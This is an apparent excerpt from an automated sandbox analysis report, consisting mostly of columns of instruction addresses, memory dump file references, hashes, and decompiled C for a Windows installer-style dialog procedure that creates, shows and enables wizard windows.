                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406aa3
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00000000
                                                        0x00406a11
                                                        0x00406a9d
                                                        0x004069a6
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d2e
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00000000
                                                        0x00406fbf
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x00000000
                                                        0x00407132
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                        • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                        • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                        • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 193 403d2c-403d35 191->193 194 403eb9-403ece 192->194 195 403e6c-403ea7 GetDlgItem * 2 call 4041e1 KiUserCallbackDispatcher call 40140b 192->195 198 403d37-403d44 SetWindowPos 193->198 199 403d4a-403d4d 193->199 196 403ed0-403ed3 194->196 197 403f0e-403f13 call 40422d 194->197 213 403eac-403eb4 195->213 202 403ed5-403ee0 call 401389 196->202 203 403f06-403f08 196->203 212 403f18-403f33 197->212 198->199 205 403d67-403d6d 199->205 206 403d4f-403d61 ShowWindow 199->206 202->203 225 403ee2-403f01 SendMessageW 202->225 203->197 211 4041ae 203->211 208 403d89-403d8c 205->208 209 403d6f-403d84 DestroyWindow 205->209 206->205 216 403d8e-403d9a SetWindowLongW 208->216 217 403d9f-403da5 208->217 214 40418b-404191 209->214 215 4041b0-4041b7 211->215 219 403f35-403f37 call 40140b 212->219 220 403f3c-403f42 212->220 213->194 214->211 227 404193-404199 214->227 216->215 223 403e48-403e56 call 404248 217->223 224 403dab-403dbc GetDlgItem 217->224 219->220 221 403f48-403f53 220->221 222 40416c-404185 DestroyWindow EndDialog 220->222 221->222 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 221->229 222->214 223->215 230 403ddb-403dde 224->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 224->231 225->215 227->211 228 40419b-4041a4 ShowWindow 227->228 228->211 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 234 403de0-403de1 230->234 235 403de3-403de6 230->235 231->211 231->230 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->223 244 403e2f-403e42 SendMessageW 239->244 245 403dfb-403e01 239->245 243 403df0-403df2 240->243 240->244 243->238 244->223 248 403e03-403e09 call 40140b 245->248 249 403e18-403e21 call 40140b 245->249 256 403e0f 248->256 249->223 258 403e23-403e2d 249->258 256->238 258->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->212 280 404081-404083 269->280 280->212 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->214 285 4040c6-4040f3 CreateDialogParamW 282->285 283->211 284 40409b-4040a1 283->284 284->212 286 4040a7 284->286 285->214 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->214
                                                        C-Code - Quality: 83%
                                                        			E00403D08(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t144;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x4236d0 = _t37;
					if(_t118 == 0x110) {
						 *0x42a208 = _t128;
						 *0x4236e4 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216b0 = _t94;
						E004041E1(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x4291e8); // executed
						 *0x4291cc = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x4236d0 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x42a240;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E0040422D(0x40b);
						while(1) {
							_t39 =  *0x4236d0;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x42a244;
							if(_t41 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291cc - _t136;
							if( *0x4291cc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E0040626E(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004041E1(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004041E1(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004041E1(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x42a2ac - _t136;
							_v32 = _t51;
							if( *0x42a2ac != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404203(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x4216b0, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x4236e4);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x4216b0);
							}
							E00404216();
							E0040624C(0x4236e8, E00403CE9());
							E0040626E(0x4236e8, _t128, _t133,  &(0x4236e8[lstrlenW(0x4236e8)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x4236e8); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291d8); // executed
									 *0x4226c0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x42a200,  *_t133 +  *0x4291e0 & 0x0000ffff, _t128,  *( *(_t133 + 4) * 4 + "~C@"), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x4291d8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004041E1(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x4291d8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x4291cc - _t136;
									if( *0x4291cc != _t136) {
										goto L61;
									}
									ShowWindow( *0x4291d8, 8); // executed
									E0040422D(0x405);
									goto L58;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L61;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x4291d8);
						 *0x42a208 = _t136;
						EndDialog(_t128,  *0x421eb8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x4291d8, 0x40f, 0, 1);
						__eflags =  *0x4291cc;
						return 0 |  *0x4291cc == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x4236c8, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x4236c8,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E00404248(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x4291d8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2ac - _t136;
										if( *0x42a2ac == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x421eb8 = 1;
											L21:
											_push(0x78);
											L22:
											E004041BA();
											goto L26;
										}
										E0040140B(_t130);
										 *0x421eb8 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x4291d8);
						 *0x4291d8 = _a12;
						L58:
						_t144 =  *0x4256e8 - _t136; // 0x1
						if(_t144 == 0 &&  *0x4291d8 != _t136) {
							ShowWindow(_t128, 0xa); // executed
							 *0x4256e8 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                        0x00403d11
                                                        0x00403d1a
                                                        0x00403e5b
                                                        0x00403e5f
                                                        0x00403e63
                                                        0x00403e65
                                                        0x00403e6a
                                                        0x00403e75
                                                        0x00403e80
                                                        0x00403e85
                                                        0x00403e87
                                                        0x00403e89
                                                        0x00403e8c
                                                        0x00403e91
                                                        0x00403e9f
                                                        0x00403eac
                                                        0x00403eb3
                                                        0x00403eb3
                                                        0x00403eb4
                                                        0x00403eb4
                                                        0x00403eb9
                                                        0x00403ebf
                                                        0x00403ec6
                                                        0x00403ecc
                                                        0x00403ece
                                                        0x00403f0e
                                                        0x00403f13
                                                        0x00403f18
                                                        0x00403f18
                                                        0x00403f1d
                                                        0x00403f26
                                                        0x00403f28
                                                        0x00403f2d
                                                        0x00403f33
                                                        0x00403f37
                                                        0x00403f37
                                                        0x00403f3c
                                                        0x00403f42
                                                        0x00000000
                                                        0x00000000
                                                        0x00403f4d
                                                        0x00403f53
                                                        0x00000000
                                                        0x00000000
                                                        0x00403f5c
                                                        0x00403f64
                                                        0x00403f69
                                                        0x00403f6c
                                                        0x00403f72
                                                        0x00403f77
                                                        0x00403f7a
                                                        0x00403f80
                                                        0x00403f85
                                                        0x00403f88
                                                        0x00403f8e
                                                        0x00403f96
                                                        0x00403f9c
                                                        0x00403fa2
                                                        0x00403fa6
                                                        0x00403fad
                                                        0x00403fad
                                                        0x00403fad
                                                        0x00403fb7
                                                        0x00403fc9
                                                        0x00403fd5
                                                        0x00403fda
                                                        0x00403fe4
                                                        0x00403fea
                                                        0x00403fec
                                                        0x00403ff1
                                                        0x00403fee
                                                        0x00403fee
                                                        0x00403fee
                                                        0x00404001
                                                        0x00404019
                                                        0x0040401b
                                                        0x00404021
                                                        0x00404036
                                                        0x00404023
                                                        0x0040402c
                                                        0x0040402e
                                                        0x0040402e
                                                        0x0040403c
                                                        0x0040404d
                                                        0x00404063
                                                        0x0040406a
                                                        0x00404070
                                                        0x00404074
                                                        0x00404079
                                                        0x0040407b
                                                        0x00000000
                                                        0x00404081
                                                        0x00404081
                                                        0x00404083
                                                        0x00000000
                                                        0x00000000
                                                        0x00404089
                                                        0x0040408d
                                                        0x004040b2
                                                        0x004040b8
                                                        0x004040be
                                                        0x004040c0
                                                        0x00000000
                                                        0x00000000
                                                        0x004040e6
                                                        0x004040ec
                                                        0x004040ee
                                                        0x004040f3
                                                        0x00000000
                                                        0x00000000
                                                        0x004040f9
                                                        0x004040fc
                                                        0x004040ff
                                                        0x00404116
